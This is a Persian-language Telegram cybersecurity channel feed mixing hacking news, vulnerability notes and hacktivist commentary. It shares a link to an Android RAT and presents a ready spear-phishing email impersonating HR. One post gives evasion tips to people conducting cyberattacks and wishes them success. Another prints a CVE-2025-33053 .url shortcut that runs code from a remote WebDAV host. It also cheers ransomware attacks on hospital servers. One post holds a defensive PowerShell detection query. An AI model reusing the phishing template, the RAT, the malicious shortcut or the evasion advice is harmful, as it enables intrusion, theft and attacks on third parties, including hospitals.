Forwarded from RAVEN | ریون (𝑹𝑨𝑽𝑬𝑵)
🤍 بعد اتفاق تلخی که برای الهه حسیننژاد افتاد باید همه قابلیت sos گوشی روشن کنیم
⚪️ وقتی این قابلیت فعاله شما وقتی تو خطر باشید ۳ تا ۵ بار که دکمه پاور گوشی فشار بدید سریع لوکیشن شما رو به مخاطبینی مشخص کردین ارسال میکنه و با یکیشون هم تماس میگره
✅ فعال سازی توی آیفون
✅ اندروید
⚪️ وقتی این قابلیت فعاله شما وقتی تو خطر باشید ۳ تا ۵ بار که دکمه پاور گوشی فشار بدید سریع لوکیشن شما رو به مخاطبینی مشخص کردین ارسال میکنه و با یکیشون هم تماس میگره
✅ فعال سازی توی آیفون
وارد تنظیمات گوشیتون بشید و سرچ کنید sos گزینه emergency sos رو انتخاب کنید گزینه call with 5 button presses رو فعال کنید گزینه call quietly هم میتونید فعال کنید تا در به صورت بیصدا با مخاطبتون تماس بگیره گزینه set up emergency conats in health رو بزنید
بعد کنار Emergency contacts گزینه add رو بزنید بعد add emergency contact رو بزنید و مخاطب اضطراریتون رو اضافه کنید
✅ اندروید
تو تنظیمات سرچ کنید sos یا کمک اضطراری وارد Emergency SOS یا درخواست کمک اضطراری بشید و Countdown بزارید روی 5 توی قسمت Emergency number to call یا شماره اضطراری برای تماس شماره تلفن کسی میخواین بهش زنگ بخوره مشخص کنید حالا Send SOS to emergency contacts یا ارسال SOS به مخاطبین اضطراری رو بزنید و مخاطبین که قراره بهشون اسمس و لوکیشن ارسال بشه رو وارد کنید
👍7❤1
😈9
Forwarded from Alone
رت اندرویدیG700-RAT خودم تست نگرفتم نسخه آپدیت تر شده craxsrat میتونه باشه باز رو سیستم خودتون تست نکنین رو یه مجازی سازی چیزی تست کنین
🔗 G700-RAT-g4 در GitHub
🔗 G700-RAT-g4 در GitHub
رایتاپ جدید نوشتم براتون
بخونید و حتما کامنت بزارید انرژی بگیرم
https://matitanium.medium.com/account-takeover-with-oauth-misconfiguration-d6b384649930
بخونید و حتما کامنت بزارید انرژی بگیرم
https://matitanium.medium.com/account-takeover-with-oauth-misconfiguration-d6b384649930
Medium
Account Takeover with OAuth Misconfiguration.
Hello folks,
❤11
داشتم درس روانشناسی میخوندم برای امتحان…
ولی یچیزایی فهمیدم برای حمله های مهندسی اجتماعی خیلی بدرد بخورن
براتون مینویسم علاقه داشتین بخونین
ولی یچیزایی فهمیدم برای حمله های مهندسی اجتماعی خیلی بدرد بخورن
براتون مینویسم علاقه داشتین بخونین
👍15❤2
از لحاظ روانشناسی سازمانی:
یه بحث داریم به اسم انگیزش که افرادی که داخل سازمان کار میکنند باید سه تا نیازشون براورده بشه (خوب بخونید این جملرو)👍
اسمش هست ساختار انگیزشی ERG
Existence, Relatedness, Growth
این چی میگه؟
داره میگه کسی که یجایی کار میکنه باید حواستون به سه حالتش باشه تا کارمند رضایت داشته باشه!
Existence = نگران بقا بودن
کارمندی که مشخصه از بقای شغلیش میترسه یا کلا نگران حضور و ایندش هست داخل اون سازمان
معمولا سازمان ها این نیاز افراد رو براورده میکنن
ولی اگه کاربری نا رضایت باشه از پروفایل لینکدین و سوشیالش میشه فهمید این شخص ناراضیه و میشه پیام فیشینگی مبنی بر اخراج شما، قطع حقوق، مشکل بیمه
یا دادن وعده تضمین شغلی در اگهی زیر وادارش کرد به کلیک کردن روی ملیشس فایل🤏
یه بحث داریم به اسم انگیزش که افرادی که داخل سازمان کار میکنند باید سه تا نیازشون براورده بشه (خوب بخونید این جملرو)👍
اسمش هست ساختار انگیزشی ERG
Existence, Relatedness, Growth
این چی میگه؟
داره میگه کسی که یجایی کار میکنه باید حواستون به سه حالتش باشه تا کارمند رضایت داشته باشه!
Existence = نگران بقا بودن
کارمندی که مشخصه از بقای شغلیش میترسه یا کلا نگران حضور و ایندش هست داخل اون سازمان
معمولا سازمان ها این نیاز افراد رو براورده میکنن
ولی اگه کاربری نا رضایت باشه از پروفایل لینکدین و سوشیالش میشه فهمید این شخص ناراضیه و میشه پیام فیشینگی مبنی بر اخراج شما، قطع حقوق، مشکل بیمه
یا دادن وعده تضمین شغلی در اگهی زیر وادارش کرد به کلیک کردن روی ملیشس فایل🤏
👍9❤3
CyberSecurity
از لحاظ روانشناسی سازمانی: یه بحث داریم به اسم انگیزش که افرادی که داخل سازمان کار میکنند باید سه تا نیازشون براورده بشه (خوب بخونید این جملرو)👍 اسمش هست ساختار انگیزشی ERG Existence, Relatedness, Growth این چی میگه؟ داره میگه کسی که یجایی کار میکنه باید…
یادتون باشه اکثر سازمان ها اینو کاور میکنن روی کاربراشون
نه برای که کلیک نکنن جایی
کلا چارت و آموزش مدیر ها روی این سبک هستش
نه برای که کلیک نکنن جایی
کلا چارت و آموزش مدیر ها روی این سبک هستش
❤4👍2
بحث دیگه ما Relatedness هست👍
ضعف ارتباطی کارمند و نبود افرادی که راحت باهاشون صحبت کنه یا ارتباط بگیره
(اینم معمولا برای کارمندا ارضا میکنن)
کارمندایی بیشتر تحت اکسپلویت قرار میگیرن که:
با افراد دورشون داخل محیط کار مشکل دارن
ناراحتیای ارتباطی دارن
و با وعده کار های ارتباطی و این داستانا میشه گولشون زد برای باز کردن لینک👍
اما اما اما
مشکل اصلی تویه بینهایت طلبی ادما و میل به رشد نامحدوده!
بحثGrowth
که نیازی نیست براحتی بشه براوردش کرد
افراد سازمان دوست دارن که همیشه رشد کنن و هر ایمیلی که مربوط به رشد علمی، حقوقی یا هرچیزی که باعث بشه جایگاهشون فرق کنه رو باز میکنن :)
ضعف ارتباطی کارمند و نبود افرادی که راحت باهاشون صحبت کنه یا ارتباط بگیره
(اینم معمولا برای کارمندا ارضا میکنن)
کارمندایی بیشتر تحت اکسپلویت قرار میگیرن که:
با افراد دورشون داخل محیط کار مشکل دارن
ناراحتیای ارتباطی دارن
و با وعده کار های ارتباطی و این داستانا میشه گولشون زد برای باز کردن لینک👍
اما اما اما
مشکل اصلی تویه بینهایت طلبی ادما و میل به رشد نامحدوده!
بحثGrowth
که نیازی نیست براحتی بشه براوردش کرد
افراد سازمان دوست دارن که همیشه رشد کنن و هر ایمیلی که مربوط به رشد علمی، حقوقی یا هرچیزی که باعث بشه جایگاهشون فرق کنه رو باز میکنن :)
❤5
CyberSecurity
بحث دیگه ما Relatedness هست👍 ضعف ارتباطی کارمند و نبود افرادی که راحت باهاشون صحبت کنه یا ارتباط بگیره (اینم معمولا برای کارمندا ارضا میکنن) کارمندایی بیشتر تحت اکسپلویت قرار میگیرن که: با افراد دورشون داخل محیط کار مشکل دارن ناراحتیای ارتباطی دارن و با…
Subject: فرصت ارتقاء به سمت جدید – فقط برای افراد منتخب تیم
From: HR Department <hr@company-career.com>
Hi Mobina,
امیدواریم روز خوبی داشته باشی. با توجه به عملکرد فوقالعاده شما در بخش پشتیبانی و میزان رضایت بالای مشتریان در سهماهه گذشته، نام شما بهعنوان یکی از کاندیداهای ارتقاء به سمت “سرپرست تیم پاسخگویی” انتخاب شده است.
لطفاً برای تایید صلاحیت خود، فرم ارزیابی اولیه را از طریق لینک زیر تکمیل نمایید:
🔗 فرم ارزیابی عملکرد فردی
محدودیت زمانی: تا ساعت 16 امروز
با آرزوی موفقیت
واحد منابع انسانی
From: HR Department <hr@company-career.com>
Hi Mobina,
امیدواریم روز خوبی داشته باشی. با توجه به عملکرد فوقالعاده شما در بخش پشتیبانی و میزان رضایت بالای مشتریان در سهماهه گذشته، نام شما بهعنوان یکی از کاندیداهای ارتقاء به سمت “سرپرست تیم پاسخگویی” انتخاب شده است.
لطفاً برای تایید صلاحیت خود، فرم ارزیابی اولیه را از طریق لینک زیر تکمیل نمایید:
🔗 فرم ارزیابی عملکرد فردی
محدودیت زمانی: تا ساعت 16 امروز
با آرزوی موفقیت
واحد منابع انسانی
❤6
CyberSecurity
Subject: فرصت ارتقاء به سمت جدید – فقط برای افراد منتخب تیم From: HR Department <hr@company-career.com> Hi Mobina, امیدواریم روز خوبی داشته باشی. با توجه به عملکرد فوقالعاده شما در بخش پشتیبانی و میزان رضایت بالای مشتریان در سهماهه گذشته، نام شما بهعنوان…
نمونه ایمیل فیشینگ برای تحت تاثیر قرار دادن قسمت growth
https://matitanium.medium.com/designing-spear-phishing-attacks-using-behavioral-psychology-and-neuroscience-a260301391fb
رایتاپ جدیدم رو هم راجب این موضوع لایک کنید با تشکر برم درسمو بخونم
رایتاپ جدیدم رو هم راجب این موضوع لایک کنید با تشکر برم درسمو بخونم
Medium
🎯 Designing Spear Phishing Attacks Using Behavioral Psychology and Neuroscience
Hello Friends,
❤15👍3
Forwarded from localhost
امروز ظهر امریکا بیانیه ای صادر کرد ضمن اینکه هویتی تحت عنوان مستر سول رو حاضره براش 10 میلیون دلار بپردازه هرکی بتونه اونو پیدا بکنه
گویا پدافند های کشور مورد نفوذ قرار گرفته بودن که این شخص با این هویت تونسته اکسس ایرانی هارو به پدافند ها برگردونه و سیستم های اونارو مختل بکنه و خودشو مستر سول معرفی کرده
و کمتر از یکساعت بعد از فعال شدن پدافند ها بیانیه امریکایی ها منتشر شد راجب این شخص که برای اطلاعات راجب هویت اصلی این شخص حاضره 10 میلیون دلار بپردازه
گویا پدافند های کشور مورد نفوذ قرار گرفته بودن که این شخص با این هویت تونسته اکسس ایرانی هارو به پدافند ها برگردونه و سیستم های اونارو مختل بکنه و خودشو مستر سول معرفی کرده
و کمتر از یکساعت بعد از فعال شدن پدافند ها بیانیه امریکایی ها منتشر شد راجب این شخص که برای اطلاعات راجب هویت اصلی این شخص حاضره 10 میلیون دلار بپردازه
❤15👍1
Forwarded from SoheilSec (Soheil)
با سلام و وقت بخیر،
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید
Get-DnsServerResourceRecord -ZoneName "domain.corp" | Where-Object { $_.HostName -like "*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA*" }❤1
ردیاب جنگ سایبری ایران و اسرائیل - شماره ۱ 🚨
با بررسی ۴۸ ساعت گذشته فعالیت گروههای هکتیویستی مرتبط با تنشهای ایران و اسرائیل.
تا این لحظه ۸۳ گروه هکتیویست فعال هستند و انتظار میرود تعدادشان افزایش یابد.
تعداد گروههای «ضد ایران» بیشتر از گروههای حامی اسرائیل است. بهطور سنتی اسرائیل حمایت کمتری از هکتیویستها دارد، اما این بار تعداد گروههای ضدایرانی قابل توجه است.
در حال حاضر ۳ گروه هکتیویست طرفدار روسیه در حمایت از ایران فعالاند.
ادعاهای حملههای سایبری شامل موارد زیر هستند:
• حملات دیداس (DDoS)
• تغییر ظاهر سایتها (Defacement)
• نشت اطلاعات (Data Breach)
• افشای اطلاعات شخصی (Doxing)
• حذف حسابهای شبکههای اجتماعی
• باجافزار
• حمله به زیرساختهای عملیاتی (OT)
گروههای وابسته به دولتها تنها چند ساعت پس از حملات موشکی دوباره فعال شدند؛ از جمله گروه Handala Hack در حمایت از ایران
@matitanium
با بررسی ۴۸ ساعت گذشته فعالیت گروههای هکتیویستی مرتبط با تنشهای ایران و اسرائیل.
تا این لحظه ۸۳ گروه هکتیویست فعال هستند و انتظار میرود تعدادشان افزایش یابد.
تعداد گروههای «ضد ایران» بیشتر از گروههای حامی اسرائیل است. بهطور سنتی اسرائیل حمایت کمتری از هکتیویستها دارد، اما این بار تعداد گروههای ضدایرانی قابل توجه است.
در حال حاضر ۳ گروه هکتیویست طرفدار روسیه در حمایت از ایران فعالاند.
ادعاهای حملههای سایبری شامل موارد زیر هستند:
• حملات دیداس (DDoS)
• تغییر ظاهر سایتها (Defacement)
• نشت اطلاعات (Data Breach)
• افشای اطلاعات شخصی (Doxing)
• حذف حسابهای شبکههای اجتماعی
• باجافزار
• حمله به زیرساختهای عملیاتی (OT)
گروههای وابسته به دولتها تنها چند ساعت پس از حملات موشکی دوباره فعال شدند؛ از جمله گروه Handala Hack در حمایت از ایران
@matitanium
❤7👍1😈1
تیم های هکتیویسم ایران ، از جمله گروه Handala Hack، تنها چند ساعت پس از حملات اخیر اسرائیل دوباره شروع به حملات سایبری کردند.
آنها مدعی نفوذ به سامانههای حیاتی نظامی اسرائیل شدهاند.
🔺 انتظار میرود در روزها و هفتههای آینده ادعاهای بیشتری از این نوع منتشر شود.
@matitanium
آنها مدعی نفوذ به سامانههای حیاتی نظامی اسرائیل شدهاند.
🔺 انتظار میرود در روزها و هفتههای آینده ادعاهای بیشتری از این نوع منتشر شود.
@matitanium
❤9
🔴کسایی که دارن حمله سایبری انجام میدن دقت کنن:
1. از سیستم عاملی استفاده کنید که هیچ نشانی از هویت شما نداشته باشه
(اگر سیستم دوم ندارید فقط ماشین مجازی)
2. با نیک نیم های فیک کاراتونو انجام بدین.
3. فرض بزارید سیستمتون در لحظه آلوده شد، نباید هیچ راه رسیدن به هویت شما وجود داشته باشه.
4. ترجیحا از IP سوئد استفاده کنید
در نهایت موفق باشید🇮🇷❤️
1. از سیستم عاملی استفاده کنید که هیچ نشانی از هویت شما نداشته باشه
(اگر سیستم دوم ندارید فقط ماشین مجازی)
2. با نیک نیم های فیک کاراتونو انجام بدین.
3. فرض بزارید سیستمتون در لحظه آلوده شد، نباید هیچ راه رسیدن به هویت شما وجود داشته باشه.
4. ترجیحا از IP سوئد استفاده کنید
در نهایت موفق باشید🇮🇷❤️
❤22👍1
Forwarded from APT IRAN مرکز تحقیقاتی
سرور بیمارستان و بخش های مالی رژیم صهیونیستی هم مورد نفوذ ایران سایبر ICG هستند و درحال پیاده سازی حملات باج افزاری روی این سرور ها و زیرساخت های رژیم کودک_کش اسرائیل هستند ، اخبار مرتبط با گروه هایی که به صورت مستقل در ایران فعالیت میکنند دنبال میکنیم .
👍30❤8👎7🔥1
با سلام و وقت بخیر،
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
❤5
Forwarded from کانال رسمی بلوبات | blubot (Alireza)
مبلغ 6 میلیون دلار هم روی شبکه تون از صرافی #نوبیتکس دزدیده شده است!
همچنان هکرها درحال برداشت هستند مبلغ به 49,173,669.03 دلار رسید!
همچنان هکرها درحال برداشت هستند مبلغ به 49,173,669.03 دلار رسید!
❤2